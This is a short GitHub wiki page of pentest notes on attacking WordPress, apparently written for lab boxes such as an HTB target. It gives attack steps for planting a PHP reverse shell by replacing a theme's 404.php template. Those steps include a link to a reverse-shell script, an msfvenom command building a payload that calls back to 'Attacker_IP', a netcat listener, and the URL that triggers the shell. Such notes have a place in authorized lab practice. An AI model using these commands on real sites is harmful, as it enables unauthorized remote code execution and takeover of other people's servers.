-
Notifications
You must be signed in to change notification settings - Fork 14
WordPress attacks
lethanhtung01011980 edited this page Jun 19, 2020
·
5 revisions
- Special attacks on WordPress
- To change 404 Template (404.php) into php-reverse-shell.php
PHP Reverse shell:
- https://github.com/lethanhtung01011980/Notes/wiki/Create-reverse-shell-payload#web-full-shell
- PHP special reverse shell: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
- PHP: msfvenom -p php/reverse_php LHOST=Attacker_IP LPORT=Attacker_Listener_Port -f raw > shell.php
Trigger reverse shell
- nc -nlvp 5678
- Depend on theme: http://apocalyst.htb/wp-content/themes/twentyseventeen/404.php